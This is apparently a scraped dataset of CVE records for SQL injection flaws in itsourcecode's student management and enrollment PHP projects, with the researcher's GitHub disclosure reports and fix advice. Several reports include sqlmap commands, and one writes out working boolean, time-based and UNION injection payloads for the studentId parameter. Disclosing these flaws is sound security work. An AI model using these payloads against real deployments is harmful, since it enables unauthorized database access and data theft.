[ { "source": "cna@vuldb.com", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/Lanxiy7th/lx_CVE_report-/issues/2" }, { "source": "cna@vuldb.com", "tags": [ "Permissions Required", "VDB Entry" ], "url": "https://vuldb.com/?ctiid.266293" }, { "source": "cna@vuldb.com", "tags": [ "Third Party Advisory", "VDB Entry" ], "url": "https://vuldb.com/?id.266293" }, { "source": "cna@vuldb.com", "tags": [ "Third Party Advisory", "VDB Entry" ], "url": "https://vuldb.com/?submit.344447" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/Lanxiy7th/lx_CVE_report-/issues/2" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Permissions Required", "VDB Entry" ], "url": "https://vuldb.com/?ctiid.266293" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory", "VDB Entry" ], "url": "https://vuldb.com/?id.266293" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory", "VDB Entry" ], "url": "https://vuldb.com/?submit.344447" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:itsourcecode:student_information_management_system:1.0:*:*:*:*:*:*:*", "matchCriteriaId": "EC83737B-EB58-46E4-B676-6F2B29894828", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "89" ]
89
https://github.com/Lanxiy7th/lx_CVE_report-/issues/2
[ "Exploit", "Third Party Advisory" ]
github.com
[ "Lanxiy7th", "lx_CVE_report-" ]
# Itsourcecode Student Information Management System in PHP 1.0 view.php SQL injection # NAME OF AFFECTED PRODUCT(S) + Student Information Management System in PHP ## Vendor Homepage + https://itsourcecode.com/free-projects/php-project/st-columban-student-information-management-system # AFFECTED AND/OR FIXED VERSION(S) ## submitter + Lanxiy7th ## Vulnerable File + view.php ## VERSION(S) + V1.0 ## Software Link + https://itsourcecode.com/wp-content/uploads/2015/10/columbans.zip # PROBLEM TYPE ## Vulnerability Type + SQL injection ## Root Cause + A SQL injection vulnerability was found in the 'view.php' file of the 'Student Information Management System' project. The reason for this issue is that attackers inject malicious code from the parameter "studentId" and use it directly in SQL queries without the need for appropriate cleaning or validation. This allows attackers to forge input values, thereby manipulating SQL queries and performing unauthorized operations. + <img width="771" alt="3" src="https://github.com/Lanxiy7th/lx_CVE_report-/assets/151617791/365e1c5f-148c-4402-9be2-0406aedb9933"> ## Impact + Attackers can exploit this SQL injection vulnerability to achieve unauthorized database access, sensitive data leakage, data tampering, comprehensive system control, and even service interruption, posing a serious threat to system security and business continuity. # DESCRIPTION + During the security review of the PHP Student Information Management System, Lanxiy7th discovered a critical SQL injection vulnerability in the "view. php" file. This vulnerability stems from insufficient user input validation of the "studentId" parameter, allowing attackers to inject malicious SQL queries. Therefore, attackers can gain unauthorized access to databases, modify or delete data, and access sensitive information. Immediate remedial measures are needed to ensure system security and protect data integrity. # Vulnerability details and POC ## Vulnerability type: + boolean-based blind + time-based blind + UNION query ## Vulnerability location: + 'studentId' parameter ## Payload: ```sql view=view&studentId=20004277 AND 5254=5254 view=view&studentId=20004277 AND (SELECT 4018 FROM (SELECT(SLEEP(5)))eHNw) view=view&studentId=20004277 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,CONCAT(0x71786a6a71,0x504c53717a6d734774675378794d566b745a5862626e4f75627344584353546d707971565056654a,0x716b6b7871),NULL,NULL,NULL,NULL,NULL-- - ``` ```Parameter: studentId (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: view=view&studentId=20004277 AND 5254=5254 Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: view=view&studentId=20004277 AND (SELECT 4018 FROM (SELECT(SLEEP(5)))eHNw) Type: UNION query Title: Generic UNION query (NULL) - 11 columns Payload: view=view&studentId=20004277 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,CONCAT(0x71786a6a71,0x504c53717a6d734774675378794d566b745a5862626e4f75627344584353546d707971565056654a,0x716b6b7871),NULL,NULL,NULL,NULL,NULL-- - ``` + <img width="343" alt="1" src="https://github.com/Lanxiy7th/lx_CVE_report-/assets/151617791/208d9ee7-2f93-47af-9f30-91f8f8ebd399"> ## The following are screenshots of some specific information obtained from testing and running with the sqlmap tool: ```bash sqlmap -u "http://192.168.144.199:1215/columbans/admin/modules/class/index.php?view=class&classId=7" --batch --level 5 --dbs ``` + <img width="318" alt="2" src="https://github.com/Lanxiy7th/lx_CVE_report-/assets/151617791/ff290383-1b67-47c7-acbf-a9030a774c06"> # Suggested repair 1. **Use prepared statements and parameter binding:** Preparing statements can prevent SQL injection as they separate SQL code from user input data. When using prepare statements, the value entered by the user is treated as pure data and will not be interpreted as SQL code. 2. **Input validation and filtering:** Strictly validate and filter user input data to ensure it conforms to the expected format. 3. **Minimize database user permissions:** Ensure that the account used to connect to the database has the minimum necessary permissions. Avoid using accounts with advanced permissions (such as' root 'or' admin ') for daily operations. 4. **Regular security audits:** Regularly conduct code and system security audits to promptly identify and fix potential security vulnerabilities.
Itsourcecode Student Information Management System in PHP 1.0 view.php SQL injection
https://api.github.com/repos/Lanxiy7th/lx_CVE_report-/issues/2/comments
0
2024-05-25T08:52:02Z
2024-05-25T08:52:02Z
https://github.com/Lanxiy7th/lx_CVE_report-/issues/2
2,316,847,327
2
6,033
CVE-2024-5390
2024-05-27T01:15:20.410
A vulnerability, which was classified as critical, was found in itsourcecode Online Student Enrollment System 1.0. Affected is an unknown function of the file listofstudent.php. The manipulation of the argument lname leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-266304.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "PARTIAL", "baseScore": 6.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 8, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "cna@vuldb.com", "type": "Secondary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "LOW", "baseScore": 6.3, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 3.4, "source": "cna@vuldb.com", "type": "Secondary" }, { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": [ { "cvssData": { "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "Safety": "NOT_DEFINED", "attackComplexity": "LOW", "attackRequirements": "NONE", "attackVector": "NETWORK", "availabilityRequirement": "NOT_DEFINED", "baseScore": 5.3, "baseSeverity": "MEDIUM", "confidentialityRequirement": "NOT_DEFINED", "exploitMaturity": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "privilegesRequired": "LOW", "providerUrgency": "NOT_DEFINED", "subAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "userInteraction": "NONE", "valueDensity": "NOT_DEFINED", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "version": "4.0", "vulnAvailabilityImpact": "LOW", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "LOW", "vulnerabilityResponseEffort": "NOT_DEFINED" }, "source": "cna@vuldb.com", "type": "Secondary" } ] }
[ { "source": "cna@vuldb.com", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/Lanxiy7th/lx_CVE_report-/issues/3" }, { "source": "cna@vuldb.com", "tags": [ "Permissions Required", "VDB Entry" ], "url": "https://vuldb.com/?ctiid.266304" }, { "source": "cna@vuldb.com", "tags": [ "Third Party Advisory", "VDB Entry" ], "url": "https://vuldb.com/?id.266304" }, { "source": "cna@vuldb.com", "tags": [ "Third Party Advisory", "VDB Entry" ], "url": "https://vuldb.com/?submit.344603" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/Lanxiy7th/lx_CVE_report-/issues/3" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Permissions Required", "VDB Entry" ], "url": "https://vuldb.com/?ctiid.266304" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory", "VDB Entry" ], "url": "https://vuldb.com/?id.266304" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory", "VDB Entry" ], "url": "https://vuldb.com/?submit.344603" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:itsourcecode:online_student_enrollment_system:1.0:*:*:*:*:*:*:*", "matchCriteriaId": "206B072E-A37F-4569-B5E1-B2305B37DB95", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "89" ]
89
https://github.com/Lanxiy7th/lx_CVE_report-/issues/3
[ "Exploit", "Third Party Advisory" ]
github.com
[ "Lanxiy7th", "lx_CVE_report-" ]
# Itsourcecode Online Student Enrollment System Project In PHP listofstudent.php SQL injection # NAME OF AFFECTED PRODUCT(S) + Online Student Enrollment System Project In PHP ## Vendor Homepage + https://itsourcecode.com/free-projects/php-project/online-student-enrollment-system/ # AFFECTED AND/OR FIXED VERSION(S) ## submitter + Lanxiy7th ## Vulnerable File + listofstudent.php ## VERSION(S) + V1.0 ## Software Link + https://itsourcecode.com/wp-content/uploads/2016/01/kccreg.zip # PROBLEM TYPE ## Vulnerability Type + SQL injection ## Root Cause + A SQL injection vulnerability was found in the 'listofstudent.php' file of the 'online-student-enrollment-system' project. The reason for this issue is that attackers inject malicious code from the parameter "lname" and use it directly in SQL queries without the need for appropriate cleaning or validation. This allows attackers to forge input values, thereby manipulating SQL queries and performing unauthorized operations. <img width="676" alt="1" src="https://github.com/Lanxiy7th/lx_CVE_report-/assets/151617791/092aad2a-a253-436b-bac7-7c11bd9fdfc5"> ## Impact + Attackers can exploit this SQL injection vulnerability to achieve unauthorized database access, sensitive data leakage, data tampering, comprehensive system control, and even service interruption, posing a serious threat to system security and business continuity. # DESCRIPTION + During the security review of the 'Online Student Enrollment System Project In PHP', Lanxiy7th discovered a critical SQL injection vulnerability in the "listofstudent.php" file. This vulnerability stems from insufficient user input validation of the "lname" parameter, allowing attackers to inject malicious SQL queries. Therefore, attackers can gain unauthorized access to databases, modify or delete data, and access sensitive information. Immediate remedial measures are needed to ensure system security and protect data integrity. # Vulnerability details and POC ## Vulnerability type: + boolean-based blind + time-based blind + UNION query ## Vulnerability location: + 'lname' parameter ## Payload: <img width="313" alt="2" src="https://github.com/Lanxiy7th/lx_CVE_report-/assets/151617791/30c55af8-5cdc-4096-a846-51f9cf7299ea"> ## The following are screenshots of some specific information obtained from testing and running with the sqlmap tool: ```bash sqlmap -u "http://192.168.144.199:1217/kccreg/listofstudent.php?lname=1231&fname=123&idno=123" --batch --level 5 --dbs ``` <img width="312" alt="3" src="https://github.com/Lanxiy7th/lx_CVE_report-/assets/151617791/745fd73b-6490-4690-8e75-ba50da77ccb1"> # Suggested repair 1. **Use prepared statements and parameter binding:** Preparing statements can prevent SQL injection as they separate SQL code from user input data. When using prepare statements, the value entered by the user is treated as pure data and will not be interpreted as SQL code. 2. **Input validation and filtering:** Strictly validate and filter user input data to ensure it conforms to the expected format. 3. **Minimize database user permissions:** Ensure that the account used to connect to the database has the minimum necessary permissions. Avoid using accounts with advanced permissions (such as' root 'or' admin ') for daily operations. 4. **Regular security audits:** Regularly conduct code and system security audits to promptly identify and fix potential security vulnerabilities.
Itsourcecode Online Student Enrollment System Project In PHP listofstudent.php SQL injection
https://api.github.com/repos/Lanxiy7th/lx_CVE_report-/issues/3/comments
0
2024-05-26T03:19:39Z
2024-05-26T03:19:40Z
https://github.com/Lanxiy7th/lx_CVE_report-/issues/3
2,317,412,593
3
6,034
CVE-2024-5391
2024-05-27T01:15:20.693
A vulnerability has been found in itsourcecode Online Student Enrollment System 1.0 and classified as critical. Affected by this vulnerability is an unknown functionality of the file listofsubject.php. The manipulation of the argument subjcode leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-266305 was assigned to this vulnerability.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "PARTIAL", "baseScore": 6.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 8, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "cna@vuldb.com", "type": "Secondary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "LOW", "baseScore": 6.3, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 3.4, "source": "cna@vuldb.com", "type": "Secondary" }, { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": [ { "cvssData": { "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "Safety": "NOT_DEFINED", "attackComplexity": "LOW", "attackRequirements": "NONE", "attackVector": "NETWORK", "availabilityRequirement": "NOT_DEFINED", "baseScore": 5.3, "baseSeverity": "MEDIUM", "confidentialityRequirement": "NOT_DEFINED", "exploitMaturity": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "privilegesRequired": "LOW", "providerUrgency": "NOT_DEFINED", "subAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "userInteraction": "NONE", "valueDensity": "NOT_DEFINED", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "version": "4.0", "vulnAvailabilityImpact": "LOW", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "LOW", "vulnerabilityResponseEffort": "NOT_DEFINED" }, "source": "cna@vuldb.com", "type": "Secondary" } ] }
[ { "source": "cna@vuldb.com", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/Lanxiy7th/lx_CVE_report-/issues/4" }, { "source": "cna@vuldb.com", "tags": [ "Permissions Required", "VDB Entry" ], "url": "https://vuldb.com/?ctiid.266305" }, { "source": "cna@vuldb.com", "tags": [ "Third Party Advisory", "VDB Entry" ], "url": "https://vuldb.com/?id.266305" }, { "source": "cna@vuldb.com", "tags": [ "Third Party Advisory", "VDB Entry" ], "url": "https://vuldb.com/?submit.344605" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/Lanxiy7th/lx_CVE_report-/issues/4" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Permissions Required", "VDB Entry" ], "url": "https://vuldb.com/?ctiid.266305" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory", "VDB Entry" ], "url": "https://vuldb.com/?id.266305" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory", "VDB Entry" ], "url": "https://vuldb.com/?submit.344605" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:itsourcecode:online_student_enrollment_system:1.0:*:*:*:*:*:*:*", "matchCriteriaId": "206B072E-A37F-4569-B5E1-B2305B37DB95", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "89" ]
89
https://github.com/Lanxiy7th/lx_CVE_report-/issues/4
[ "Exploit", "Third Party Advisory" ]
github.com
[ "Lanxiy7th", "lx_CVE_report-" ]
# Itsourcecode Online Student Enrollment System Project In PHP listofsubject.php SQL injection # NAME OF AFFECTED PRODUCT(S) + Online Student Enrollment System Project In PHP ## Vendor Homepage + https://itsourcecode.com/free-projects/php-project/online-student-enrollment-system/ # AFFECTED AND/OR FIXED VERSION(S) ## submitter + Lanxiy7th ## Vulnerable File + listofsubject.php ## VERSION(S) + V1.0 ## Software Link + https://itsourcecode.com/wp-content/uploads/2016/01/kccreg.zip # PROBLEM TYPE ## Vulnerability Type + SQL injection ## Root Cause + A SQL injection vulnerability was found in the 'listofsubject.php' file of the 'online-student-enrollment-system' project. The reason for this issue is that attackers inject malicious code from the parameter "subjcode" and use it directly in SQL queries without the need for appropriate cleaning or validation. This allows attackers to forge input values, thereby manipulating SQL queries and performing unauthorized operations. <img width="799" alt="1" src="https://github.com/Lanxiy7th/lx_CVE_report-/assets/151617791/2eb7197a-1d04-45e5-882d-ffd73471cef5"> ## Impact + Attackers can exploit this SQL injection vulnerability to achieve unauthorized database access, sensitive data leakage, data tampering, comprehensive system control, and even service interruption, posing a serious threat to system security and business continuity. # DESCRIPTION + During the security review of the 'Online Student Enrollment System Project In PHP', Lanxiy7th discovered a critical SQL injection vulnerability in the "listofsubject.php" file. This vulnerability stems from insufficient user input validation of the "subjcode" parameter, allowing attackers to inject malicious SQL queries. Therefore, attackers can gain unauthorized access to databases, modify or delete data, and access sensitive information. Immediate remedial measures are needed to ensure system security and protect data integrity. # Vulnerability details and POC ## Vulnerability type: + boolean-based blind + time-based blind ## Vulnerability location: + 'subjcode' parameter ## Payload: <img width="322" alt="2" src="https://github.com/Lanxiy7th/lx_CVE_report-/assets/151617791/36cab2f7-5d97-48e0-bcad-573e659edd62"> ## The following are screenshots of some specific information obtained from testing and running with the sqlmap tool: ```bash sqlmap -u "http://192.168.144.199:1217/kccreg/listofsubject.php?subjcode=123&course=19&semester=123&ay=123" --batch --level 5 --dbs ``` <img width="318" alt="3" src="https://github.com/Lanxiy7th/lx_CVE_report-/assets/151617791/57b90a71-2b6b-4b88-917a-ef8f12fd68db"> # Suggested repair 1. **Use prepared statements and parameter binding:** Preparing statements can prevent SQL injection as they separate SQL code from user input data. When using prepare statements, the value entered by the user is treated as pure data and will not be interpreted as SQL code. 2. **Input validation and filtering:** Strictly validate and filter user input data to ensure it conforms to the expected format. 3. **Minimize database user permissions:** Ensure that the account used to connect to the database has the minimum necessary permissions. Avoid using accounts with advanced permissions (such as' root 'or' admin ') for daily operations. 4. **Regular security audits:** Regularly conduct code and system security audits to promptly identify and fix potential security vulnerabilities.
Itsourcecode Online Student Enrollment System Project In PHP listofsubject.php SQL injection
https://api.github.com/repos/Lanxiy7th/lx_CVE_report-/issues/4/comments
0
2024-05-26T03:31:54Z
2024-05-26T05:03:24Z
https://github.com/Lanxiy7th/lx_CVE_report-/issues/4
2,317,416,662
4
6,035
CVE-2024-5392
2024-05-27T02:15:08.933
A vulnerability was found in itsourcecode Online Student Enrollment System 1.0 and classified as critical. Affected by this issue is some unknown functionality of the file editSubject.php. The manipulation of the argument id leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-266306 is the identifier assigned to this vulnerability.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "PARTIAL", "baseScore": 6.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 8, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "cna@vuldb.com", "type": "Secondary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "LOW", "baseScore": 6.3, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 3.4, "source": "cna@vuldb.com", "type": "Secondary" }, { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": [ { "cvssData": { "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "Safety": "NOT_DEFINED", "attackComplexity": "LOW", "attackRequirements": "NONE", "attackVector": "NETWORK", "availabilityRequirement": "NOT_DEFINED", "baseScore": 5.3, "baseSeverity": "MEDIUM", "confidentialityRequirement": "NOT_DEFINED", "exploitMaturity": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "privilegesRequired": "LOW", "providerUrgency": "NOT_DEFINED", "subAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "userInteraction": "NONE", "valueDensity": "NOT_DEFINED", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "version": "4.0", "vulnAvailabilityImpact": "LOW", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "LOW", "vulnerabilityResponseEffort": "NOT_DEFINED" }, "source": "cna@vuldb.com", "type": "Secondary" } ] }
[ { "source": "cna@vuldb.com", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/Lanxiy7th/lx_CVE_report-/issues/5" }, { "source": "cna@vuldb.com", "tags": [ "Permissions Required", "VDB Entry" ], "url": "https://vuldb.com/?ctiid.266306" }, { "source": "cna@vuldb.com", "tags": [ "Third Party Advisory", "VDB Entry" ], "url": "https://vuldb.com/?id.266306" }, { "source": "cna@vuldb.com", "tags": [ "Third Party Advisory", "VDB Entry" ], "url": "https://vuldb.com/?submit.344606" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/Lanxiy7th/lx_CVE_report-/issues/5" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Permissions Required", "VDB Entry" ], "url": "https://vuldb.com/?ctiid.266306" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory", "VDB Entry" ], "url": "https://vuldb.com/?id.266306" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory", "VDB Entry" ], "url": "https://vuldb.com/?submit.344606" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:itsourcecode:online_student_enrollment_system:1.0:*:*:*:*:*:*:*", "matchCriteriaId": "206B072E-A37F-4569-B5E1-B2305B37DB95", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "89" ]
89
https://github.com/Lanxiy7th/lx_CVE_report-/issues/5
[ "Exploit", "Third Party Advisory" ]
github.com
[ "Lanxiy7th", "lx_CVE_report-" ]
# Itsourcecode Online Student Enrollment System Project In PHP editSubject.php SQL injection # NAME OF AFFECTED PRODUCT(S) + Online Student Enrollment System Project In PHP ## Vendor Homepage + https://itsourcecode.com/free-projects/php-project/online-student-enrollment-system/ # AFFECTED AND/OR FIXED VERSION(S) ## submitter + Lanxiy7th ## Vulnerable File + editSubject.php ## VERSION(S) + V1.0 ## Software Link + https://itsourcecode.com/wp-content/uploads/2016/01/kccreg.zip # PROBLEM TYPE ## Vulnerability Type + SQL injection ## Root Cause + A SQL injection vulnerability was found in the 'editSubject.php' file of the 'online-student-enrollment-system' project. The reason for this issue is that attackers inject malicious code from the parameter "id" and use it directly in SQL queries without the need for appropriate cleaning or validation. This allows attackers to forge input values, thereby manipulating SQL queries and performing unauthorized operations. <img width="721" alt="1" src="https://github.com/Lanxiy7th/lx_CVE_report-/assets/151617791/38e3a8ab-a504-434c-a603-e678626fcb1a"> ## Impact + Attackers can exploit this SQL injection vulnerability to achieve unauthorized database access, sensitive data leakage, data tampering, comprehensive system control, and even service interruption, posing a serious threat to system security and business continuity. # DESCRIPTION + During the security review of the 'Online Student Enrollment System Project In PHP', Lanxiy7th discovered a critical SQL injection vulnerability in the "editSubject.php" file. This vulnerability stems from insufficient user input validation of the "id" parameter, allowing attackers to inject malicious SQL queries. Therefore, attackers can gain unauthorized access to databases, modify or delete data, and access sensitive information. Immediate remedial measures are needed to ensure system security and protect data integrity. # Vulnerability details and POC ## Vulnerability type: + boolean-based blind + time-based blind +UNION query ## Vulnerability location: + 'id' parameter ## Payload: <img width="313" alt="2" src="https://github.com/Lanxiy7th/lx_CVE_report-/assets/151617791/11a8f3d6-27ac-43dd-861d-3c91b0328657"> ## The following are screenshots of some specific information obtained from testing and running with the sqlmap tool: ```bash sqlmap -u "http://192.168.144.199:1217/kccreg/editSubject.php?id=11" --batch --level 5 --dbs ``` <img width="314" alt="3" 